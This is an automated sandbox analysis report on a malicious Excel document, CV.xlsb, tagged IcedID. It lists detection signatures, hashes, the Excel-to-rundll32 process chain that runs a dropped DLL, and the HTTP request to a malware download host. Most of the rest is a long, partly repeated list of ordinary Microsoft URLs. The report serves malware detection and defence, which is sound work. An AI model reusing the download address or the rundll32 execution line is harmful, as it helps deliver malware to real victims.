Analysis Report CV.xlsb

Overview

General Information

Sample Name: CV.xlsb
Analysis ID: 320216
MD5: 08b6718f28bd303f0b407e0ec0f30872
SHA1: 824489d6a73609db8763172a2e9f2e9d9f7c63a4
SHA256: 65d6c6478fb750394d0517f5ff77fa13dfd354dbbec4cff3ec9e897bf8e3e926
Tags: IcedID, macros, xlsx

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
IP address seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 5864 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 6552 cmdline: 'C:\Windows\System32\rundll32.exe' C:\gPOCoPl\xMtLxCb\WSGaRIW.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started
Author: Michael Haag, Florian Roth, Markus Neis
Data:
  Command: 'C:\Windows\System32\rundll32.exe' C:\gPOCoPl\xMtLxCb\WSGaRIW.dll,DllRegisterServer
  CommandLine: 'C:\Windows\System32\rundll32.exe' C:\gPOCoPl\xMtLxCb\WSGaRIW.dll,DllRegisterServer
  CommandLine|base64offset|contains:
  Image: C:\Windows\SysWOW64\rundll32.exe
  NewProcessName: C:\Windows\SysWOW64\rundll32.exe
  OriginalFileName: C:\Windows\SysWOW64\rundll32.exe
  ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
  ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
  ParentProcessId: 5864
  ProcessCommandLine: 'C:\Windows\System32\rundll32.exe' C:\gPOCoPl\xMtLxCb\WSGaRIW.dll,DllRegisterServer
  ProcessId: 6552

Signature Overview

AV Detection:

Multi AV Scanner detection for domain / URL
Source: http://205.185.113.20/BVd1qKwd; Virustotal: Detection: 10%
Multi AV Scanner detection for submitted file
Source: CV.xlsb; Virustotal: Detection: 9%
Source: CV.xlsb; ReversingLabs: Detection: 14%

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Section loaded: unknown origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Process created: C:\Windows\SysWOW64\rundll32.exe
Source: global traffic; TCP traffic: 192.168.2.4:49730 -> 205.185.113.20:80
Source: Joe Sandbox View; IP Address: 205.185.113.20
Source: global traffic; HTTP traffic detected:
  GET /BVd1qKwd HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 205.185.113.20
  Connection: Keep-Alive
Source: unknown; TCP traffic detected without corresponding DNS query: 205.185.113.20
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Server: nginx
  Date: Thu, 19 Nov 2020 06:13:37 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 0
  Connection: keep-alive
  Cache-Control: no-cache, no-store, must-revalidate,post-check=0,pre-check=0
  Expires: 0
  Last-Modified: Thu, 19 Nov 2020 06:13:37 GMT
  Pragma: no-cache
  Set-Cookie: _subid=1p924021ov5;Expires=Sunday, 20-Dec-2020 06:13:37 GMT;Max-Age=2678400;Path=/
  Vary: Accept-Encoding
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://api.aadrm.com/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://api.diagnostics.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://api.diagnosticssdf.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://api.microsoftstream.com/api/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://api.office.net
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://api.onedrive.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://apis.live.net/v5.0/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://augloop.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://augloop.office.com/v2
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://autodiscover-s.outlook.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://cdn.entity.
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://clients.config.office.net/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://config.edge.skype.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://cortana.ai
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://cr.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://dataservice.o365filtering.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://dataservice.o365filtering.com/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://devnull.onenote.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://directory.services.
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://entitlement.diagnostics.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://graph.ppe.windows.net
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://graph.ppe.windows.net/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://graph.windows.net
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://graph.windows.net/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://incidents.diagnostics.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://lifecycle.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://login.microsoftonline.com/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://login.windows.local
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://management.azure.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://management.azure.com/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://messaging.office.com/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://ncus-000.contentsync.
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://ncus-000.pagecontentsync.
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://officeapps.live.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://onedrive.live.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://onedrive.live.com/embed?
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://outlook.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://outlook.office365.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://powerlift.acompli.net
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://settings.outlook.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://shell.suite.office.com:1443
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://skyapi.live.net/Activity/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://store.office.cn/addinstemplate
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://store.office.com/addinstemplate
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://store.office.de/addinstemplate
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://tasks.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://templatelogging.office.com/client/log
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://web.microsoftstream.com/video/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://wus2-000.contentsync.
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://wus2-000.pagecontentsync.
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr; String found in binary or memory: https://www.odwebp.svc.ms
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://lifecycle.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://login.windows.local
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://management.azure.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://management.azure.com/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://messaging.office.com/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://ncus-000.contentsync.
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://officeapps.live.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://onedrive.live.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://outlook.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://outlook.office365.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
